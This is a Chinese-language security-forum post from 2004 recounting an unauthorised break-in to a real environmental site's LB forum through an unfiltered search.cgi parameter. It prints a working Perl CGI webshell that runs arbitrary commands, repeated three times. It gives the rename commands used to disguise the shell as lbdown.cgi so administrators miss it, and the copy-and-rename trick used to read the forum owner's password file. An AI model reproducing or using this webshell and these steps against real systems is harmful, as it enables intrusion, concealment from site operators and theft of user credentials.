|
![]() | 作者: ccxgd [ccxgd]
![]() |
登录 |
begin 最近真无聊,玩点其他的~ 从GOOGLE网上搜到一个环保网站,顺便进去逛逛 进它们论坛,原来是LB,版本XPV1201 XPV1201是低版本,本身存在很多漏洞,就这样开始了! 看来版本低是低,但打过补丁,造成我试了很多都失败。 最后,看看有没有晚一点公布的search.cgi漏洞。 点击“搜索帖子”,测试后居然变量未过滤 好了,建个WEBSHELL进去 use CGI qw(:standard); print header(-charset=>gb2312); $cmd=param("cmd"); $out=`$cmd 2>&1`; print start_form,textfield("cmd",$cmd,60); print end_form; print "<textarea cols=\"80\" rows=\"25\">$out</textarea>"; use CGI qw(:standard); print header(-charset=>gb2312); $cmd=param("cmd"); $out=`$cmd 2>&1`; print start_form,textfield("cmd",$cmd,60); print end_form; print "<textarea cols=\"80\" rows=\"25\">$out</textarea>"; use CGI qw(:standard); print header(-charset=>gb2312); $cmd=param("cmd"); $out=`$cmd 2>&1`; print start_form,textfield("cmd",$cmd,60); print end_form; print "<textarea cols=\"80\" rows=\"25\">$out</textarea>"; 不行,这是个新文件,得赶紧给改名,不然他们管理员发现怎么办。LB论坛有个文件是lbdown.cgi,实际上根本就没用,现在我运行命令 del lbdown.cgi ren cat.cgi lbdown.cgi 将本来的lbdown.cgi删除,然后将改成lbdown.cgi 这样,他们管理员就很难发现了。 现在可以做想做的事了,试试窃取他们坛主的密码! 访问lbdown.cgi,运行dir,查看结果: 哈哈,看到members******目录了。LB论坛全体用户的完全资料都是存储在这里。******是管理员设置的。 假如论坛上有个用户是A,那在这里面就有个文件是A.cgi OK,现在打开论坛,查看“管理团队”,找到坛主的名字为ADMIN(化名) 那在members******里就一定有个ADMIN.cgi 再运行 copy members******\admin.cgi d:\www\***\cgi-bin\ ren admin.cgi admin.txt 即将ADMIN.CGI复制一份到cgi-bin下再改名成记事本文件 访问http://www.***.com/cgi-bin/admin.txt 哈哈,admin这位坛主的密码就看到了。 呵呵~当然得删掉它 有了这个WEBSHELL,我们还可以做很多事情 PS:这个网站可能有点分量,我看它们的论坛同时在线400人左右。所以不敢搞破坏(我不勇敢,不管哪个我都不敢乱来:) end |
地主 发表时间: 04-01-29 17:06 |
|
20CN网络安全小组版权所有
Copyright © 2000-2010 20CN Security Group. All Rights Reserved.
论坛程序编写:NetDemon
粤ICP备05087286号